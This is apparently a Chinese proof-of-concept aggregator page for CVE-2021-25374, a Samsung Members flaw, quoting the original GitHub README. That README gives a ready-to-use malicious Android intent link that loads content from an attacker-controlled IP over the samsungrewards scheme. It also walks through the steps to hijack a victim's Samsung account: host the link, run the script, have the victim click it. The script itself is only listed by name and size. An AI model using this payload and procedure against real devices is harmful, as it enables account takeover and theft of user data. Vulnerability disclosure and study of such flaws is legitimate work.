POC详情: 6ce3364d0b085e0304aa209cbecfb27d3d59db2c

来源
https://github.com/ReversecLabs/CVE-2021-25374_Samsung-Account-Access
关联漏洞
标题: SAMSUNG Mobile devices 安全漏洞 (CVE-2021-25374)
描述:SAMSUNG Mobile devices是韩国三星(SAMSUNG)公司的一系列的三星移动设备,包括手机、平板等。 SAMSUNG Mobile devices 存在安全漏洞,该漏洞允许远程攻击者可利用该漏洞访问与三星账户相关的用户数据。
描述
This script can be used to gain access to a victim's Samsung Account if they have a specific version of Samsung Members installed on their Samsung Device, and if the victim's device is from the US or Korea region.
介绍
# CVE-2021-25374 - Samsung Account Access Script

This script can be used to gain access to a victim's Samsung Account if they have a specific version of Samsung Members installed on their Samsung Device, and if the victim's device is from the US or Korea region.

## How to use this script:

1) Host a web server and have it host a web page with the following link:

`<a href="intent://launch?url=http://<attacker IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay click here yay</a>`

NOTE: replace "\<attacker IP\>" with the IP address that you'll be running this script from.

2) Run this script

`python3 ./samsung_account_access.py`

3) Using a Samsung Phone, browse to the web server and click on the link

4) Let the script do its thing

More information about the issue this script exploits can be found here: <placeholder>
文件快照

 [4.0K]  /data/pocs/6ce3364d0b085e0304aa209cbecfb27d3d59db2c
├── [ 931]  README.md
└── [ 12K]  samsung_account_access.py

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。